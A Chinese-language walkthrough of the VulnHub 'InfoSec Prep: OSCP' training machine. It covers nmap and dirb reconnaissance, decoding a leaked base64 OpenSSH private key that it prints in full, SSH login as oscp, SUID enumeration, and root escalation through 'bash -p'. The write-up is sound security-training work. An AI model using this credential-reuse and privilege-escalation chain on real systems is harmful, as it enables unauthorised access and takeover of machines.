InfoSec Prep–vulnhub靶机渗透
前期准备靶机网络环境
靶机下载地址:
https://www.vulnhub.com/entry/infosec-prep-oscp,508/
因为是2.8G可能下载的时间要等一挺久的。
下载后,直接把ova后缀的文件导入到vm中
把网络模式设置为NAT模式
然后开机即可配置好一个正常的靶机环境
信息收集
nmap扫描
查看攻击机ip
┌──(test?kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.47.156 netmask 255.255.255.0 broadcast 192.168.47.255
inet6 fe80::20c:29ff:fe05:6523 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:05:65:23 txqueuelen 1000 (Ethernet)
RX packets 954069 bytes 227034461 (216.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1054162 bytes 106400846 (101.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3665 bytes 294696 (287.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3665 bytes 294696 (287.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
所以攻击机ip为192.168.47.156
因为是NAT模式(靶机和攻击机是在同一网段的),扫描网段结果
┌──(root?kali)-[/home/test] └─# nmap -sP 192.168.47.0/24 --min-rate 3333 Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-22 20:15 CST Nmap scan report for 192.168.47.1 Host is up (0.00012s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.47.2 Host is up (0.000037s latency). MAC Address: 00:50:56:EC:64:22 (VMware) Nmap scan report for 192.168.47.148 Host is up (0.00010s latency). MAC Address: 00:0C:29:8C:DF:83 (VMware) Nmap scan report for 192.168.47.254 Host is up (0.0024s latency). MAC Address: 00:50:56:E0:C8:5A (VMware) Nmap scan report for 192.168.47.156 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 0.49 seconds
除去.1 .2和.254 的ip,因为这些ip一般都是虚拟的网关和路由器
那么靶机IP就是
192.168.47.148
扫描一下全端口
┌──(root?kali)-[/home/test] └─# nmap -p- 192.168.47.148 --min-rate 3333 Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-22 20:28 CST Nmap scan report for 192.168.47.148 Host is up (0.000068s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 33060/tcp open mysqlx MAC Address: 00:0C:29:8C:DF:83 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
一般打开一下80端口看一下
目录扫描
尝试一下目录扫描
dirb和dirsearch
dirb扫描结果
┌──(root?kali)-[/home/test]
└─# dirb http://192.168.47.148
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jan 22 20:36:50 2024
URL_BASE: http://192.168.47.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.47.148/ ----
+ http://192.168.47.148/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.47.148/javascript/
+ http://192.168.47.148/robots.txt (CODE:200|SIZE:36)
+ http://192.168.47.148/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.47.148/wp-admin/
==> DIRECTORY: http://192.168.47.148/wp-content/
==> DIRECTORY: http://192.168.47.148/wp-includes/
+ http://192.168.47.148/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.47.148/javascript/ ----
==> DIRECTORY: http://192.168.47.148/javascript/jquery/
---- Entering directory: http://192.168.47.148/wp-admin/ ----
+ http://192.168.47.148/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.47.148/wp-admin/css/
==> DIRECTORY: http://192.168.47.148/wp-admin/images/
==> DIRECTORY: http://192.168.47.148/wp-admin/includes/
+ http://192.168.47.148/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.47.148/wp-admin/js/
==> DIRECTORY: http://192.168.47.148/wp-admin/maint/
==> DIRECTORY: http://192.168.47.148/wp-admin/network/
==> DIRECTORY: http://192.168.47.148/wp-admin/user/
结合网页的提示以及目录扫描的结果
可以知道是wordpress
拼接url/wp-admin
尝试弱口令,登录不进去
尝试一下其他的方法,在刚才的扫描结果,还发现了一个robots.txt,查阅一下
发现一个
访问一下secret.txt
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB d0VBQVFBQUFZRUF0SENzU3pIdFVGOEs4dGlPcUVDUVlMcktLckNSc2J2cTZpSUc3UjlnMFdQdjl3 K2drVVdlCkl6QlNjdmdsTEU5ZmxvbHNLZHhmTVFRYk1WR3FTQURuWUJUYXZhaWdRZWt1ZTBiTHNZ ay9yWjVGaE9VUlpMVHZkbEpXeHoKYklleUM1YTVGMERsOVVZbXpDaGU0M3owRG8waVF3MTc4R0pV UWFxc2NMbUVhdHFJaVQvMkZrRitBdmVXM2hxUGZicnc5dgpBOVFBSVVBM2xlZHFyOFhFelkvL0xx MCtzUWcvcFV1MEtQa1kxOGk2dm5maVlIR2t5VzFTZ3J5UGg1eDlCR1RrM2VSWWNOCnc2bURiQWpY S0tDSEdNK2RubkdOZ3ZBa3FUK2daV3ovTXB5MGVrYXVrNk5QN05Dek9STnJJWEFZRmExcld6YUV0 eXBId1kKa0NFY2ZXSkpsWjcrZmNFRmE1QjdnRXd0L2FLZEZSWFBRd2luRmxpUU1ZTW1hdThQWmJQ aUJJcnh0SVlYeTNNSGNLQklzSgowSFNLditIYktXOWtwVEw1T29Ba0I4ZkhGMzB1alZPYjZZVHVj MXNKS1dSSElaWTNxZTA4STJSWGVFeEZGWXU5b0x1ZzBkCnRIWWRKSEZMN2NXaU52NG1SeUo5UmNy aFZMMVYzQ2F6TlpLS3dyYVJBQUFGZ0g5SlFMMS9TVUM5QUFBQUIzTnphQzF5YzIKRUFBQUdCQUxS d3JFc3g3VkJmQ3ZMWWpxaEFrR0M2eWlxd2tiRzc2dW9pQnUwZllORmo3L2NQb0pGRm5pTXdVbkw0 SlN4UApYNWFKYkNuY1h6RUVHekZScWtnQTUyQVUycjJvb0VIcExudEd5N0dKUDYyZVJZVGxFV1Mw NzNaU1ZzYzJ5SHNndVd1UmRBCjVmVkdKc3dvWHVOODlBNk5Ja01OZS9CaVZFR3FySEM1aEdyYWlJ ay85aFpCZmdMM2x0NGFqMzI2OFBid1BVQUNGQU41WG4KYXEvRnhNMlAveTZ0UHJFSVA2Vkx0Q2o1 R05mSXVyNTM0bUJ4cE1sdFVvSzhqNGVjZlFSazVOM2tXSERjT3BnMndJMXlpZwpoeGpQblo1eGpZ THdKS2svb0dWcy96S2N0SHBHcnBPalQrelFzemtUYXlGd0dCV3RhMXMyaExjcVI4R0pBaEhIMWlT WldlCi9uM0JCV3VRZTRCTUxmMmluUlVWejBNSXB4WllrREdESm1ydkQyV3o0Z1NLOGJTR0Y4dHpC M0NnU0xDZEIwaXIvaDJ5bHYKWktVeStUcUFKQWZIeHhkOUxvMVRtK21FN25OYkNTbGtSeUdXTjZu dFBDTmtWM2hNUlJXTHZhQzdvTkhiUjJIU1J4UyszRgpvamIrSmtjaWZVWEs0VlM5VmR3bXN6V1Np c0sya1FBQUFBTUJBQUVBQUFHQkFMQ3l6ZVp0SkFwYXFHd2I2Y2VXUWt5WFhyCmJqWmlsNDdwa05i VjcwSldtbnhpeFkzMUtqckRLbGRYZ2t6TEpSb0RmWXAxVnUrc0VUVmxXN3RWY0JtNU1abVFPMWlB cEQKZ1VNemx2RnFpRE5MRktVSmRUajdmcXlPQVhEZ2t2OFFrc05tRXhLb0JBakduTTl1OHJSQXlq NVBObzF3QVdLcENMeElZMwpCaGRsbmVOYUFYRFYvY0tHRnZXMWFPTWxHQ2VhSjBEeFNBd0c1Snlz NEtpNmtKNUVrZldvOGVsc1VXRjMwd1FrVzl5aklQClVGNUZxNnVkSlBubUVXQXB2THQ2MkllVHZG cWcrdFB0R25WUGxlTzNsdm5DQkJJeGY4dkJrOFd0b0pWSmRKdDNoTzhjNGoKa010WHN2TGdSbHZl MWJaVVpYNU15bUhhbE4vTEExSXNvQzRZa2cvcE1nM3M5Y1lSUmttK0d4aVVVNWJ2OWV6d000Qm1r bwpRUHZ5VWN5ZTI4endrTzZ0Z1ZNWng0b3NySW9OOVd0RFVVZGJkbUQyVUJaMm4zQ1pNa09WOVhK eGVqdTUxa0gxZnM4cTM5ClFYZnhkTmhCYjNZcjJSakNGVUxEeGh3RFNJSHpHN2dmSkVEYVdZY09r TmtJYUhIZ2FWN2t4enlwWWNxTHJzMFM3QzRRQUEKQU1FQWhkbUQ3UXU1dHJ0QkYzbWdmY2RxcFpP cTYrdFc2aGttUjBoWk5YNVo2Zm5lZFV4Ly9RWTVzd0tBRXZnTkNLSzhTbQppRlhsWWZnSDZLLzVV blpuZ0Viak1RTVRkT09sa2JyZ3BNWWloK1pneXZLMUxvT1R5TXZWZ1Q1TE1nakpHc2FRNTM5M00y CnlVRWlTWGVyN3E5ME42VkhZWERKaFVXWDJWM1FNY0NxcHRTQ1MxYlNxdmttTnZoUVhNQWFBUzhB SncxOXFYV1hpbTE1U3AKV29xZGpvU1dFSnhLZUZUd1VXN1dPaVlDMkZ2NWRzM2NZT1I4Um9yYm1H bnpkaVpneFpBQUFBd1FEaE5YS21TMG9WTWREeQozZktaZ1R1d3I4TXk1SHlsNWpyYTZvd2ovNXJK TVVYNnNqWkVpZ1phOTZFamNldlpKeUdURjJ1Vjc3QVEyUnF3bmJiMkdsCmpkTGtjMFl0OXVicVNp a2Q1ZjhBa1psWkJzQ0lydnVEUVpDb3haQkd1RDJEVVd6T2dLTWxmeHZGQk5RRitMV0ZndGJyU1AK T2dCNGloZFBDMSs2RmRTalFKNzdmMWJOR0htbjBhbW9pdUpqbFVPT1BMMWNJUHp0MGh6RVJMajJx djlEVWVsVE9VcmFuTwpjVVdyUGdyelZHVCtRdmtrakdKRlgrcjh0R1dDQU9RUlVBQUFEQkFNMGNS aERvd09GeDUwSGtFK0hNSUoyalFJZWZ2d3BtCkJuMkZONmt3NEdMWmlWY3FVVDZhWTY4bmpMaWh0 RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
看起来像是base64,解码一下
-----BEGIN OPENSSH PRIVATE KEY----- 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 8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A= -----END OPENSSH PRIVATE KEY-----
ssh私钥泄露
这个看起来像是私钥泄露,是用来ssh连接的凭证。先留着,因为还不知道用户名是什么
看到这么多,我们连网页的内容都还没有读过,可能里面有信息可以利用
看不懂英语,用谷歌翻译一下
用户名是oscp,还得要进入/root目录下,就是得要拿到oscp用户的root权限
ssh指定私钥连接
现在就是利用上面得到的私钥泄露,注意要将整个解码出来的文件都复制进去,否则会显示密钥不正确 ,使用ssh连上oscp用户
把key复制进去
┌──(root?kali)-[/home/test/桌面]
└─# chmod 777 ssh.ssh
┌──(root?kali)-[/home/test/桌面]
└─# ssh -i ssh.ssh [email protected]
The authenticity of host '192.168.47.148 (192.168.47.148)' can't be established.
ED25519 key fingerprint is SHA256:OORLHLygIlTRZ4nXi9nq+WIrJ26fv7tfgvVHm8FaAzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.47.148' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'ssh.ssh' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ssh.ssh": bad permissions
[email protected]: Permission denied (publickey).
连接不上,根据报错信息我们要修改权限
┌──(root?kali)-[/home/test/桌面] └─# ssh -i ssh.ssh [email protected] Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon 22 Jan 2024 01:01:19 PM UTC System load: 0.0 Processes: 212 Usage of /: 27.1% of 19.56GB Users logged in: 0 Memory usage: 71% IPv4 address for eth0: 192.168.47.148 Swap usage: 0% 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1 -bash-5.0$
成功连接上ssh
-bash-5.0$ ls ip -bash-5.0$ cd / -bash-5.0$ ls bin cdrom etc lib lib64 lost+found mnt proc run snap swap.img tmp var boot dev home lib32 libx32 media opt root sbin srv sys usr -bash-5.0$ cd /root -bash: cd: /root: Permission denied -bash-5.0$ whoami oscp -bash-5.0$ pwd / -bash-5.0$ getuid -bash: getuid: command not found -bash-5.0$ id uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd) -bash-5.0$
提权SUID的bash -p
我们接下来想要查看/root就得要提权,因为oscp是普通用户
查看具有suid权限的命令
find / -perm -4000 -type f 2>/dev/null
-bash-5.0$ find / -perm -4000 -type f 2>/dev/null /snap/core22/1033/usr/bin/chfn /snap/core22/1033/usr/bin/chsh /snap/core22/1033/usr/bin/gpasswd /snap/core22/1033/usr/bin/mount /snap/core22/1033/usr/bin/newgrp /snap/core22/1033/usr/bin/passwd /snap/core22/1033/usr/bin/su /snap/core22/1033/usr/bin/sudo /snap/core22/1033/usr/bin/umount /snap/core22/1033/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core22/1033/usr/lib/openssh/ssh-keysign /snap/snapd/20671/usr/lib/snapd/snap-confine /snap/snapd/8140/usr/lib/snapd/snap-confine /snap/core18/1705/bin/mount /snap/core18/1705/bin/ping /snap/core18/1705/bin/su /snap/core18/1705/bin/umount /snap/core18/1705/usr/bin/chfn /snap/core18/1705/usr/bin/chsh /snap/core18/1705/usr/bin/gpasswd /snap/core18/1705/usr/bin/newgrp /snap/core18/1705/usr/bin/passwd /snap/core18/1705/usr/bin/sudo /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1705/usr/lib/openssh/ssh-keysign /snap/core18/1754/bin/mount /snap/core18/1754/bin/ping /snap/core18/1754/bin/su /snap/core18/1754/bin/umount /snap/core18/1754/usr/bin/chfn /snap/core18/1754/usr/bin/chsh /snap/core18/1754/usr/bin/gpasswd /snap/core18/1754/usr/bin/newgrp /snap/core18/1754/usr/bin/passwd /snap/core18/1754/usr/bin/sudo /snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core18/1754/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/newgrp /usr/bin/at /usr/bin/sudo /usr/bin/chfn /usr/bin/bash /usr/bin/pkexec /usr/bin/umount /usr/bin/chsh /usr/bin/su
看到bash,这里要知道bash -p可以转到root权限
在Linux中,bash -p 是启动 Bash Shell 的一个选项。具体而言,-p 选项用于启动 Bash 以保持执行时的权限(privileged mode)。这意味着 Bash 将以特权模式运行,具有更高的权限级别。
成功提权
bash-5.0# whoami root bash-5.0# pwd / bash-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp) bash-5.0#
ok,拿下这个靶机
复现参考文章:
https://www.cnblogs.com/takagisan/p/16253546.html
https://blog.csdn.net/qq_74240553/article/details/135679410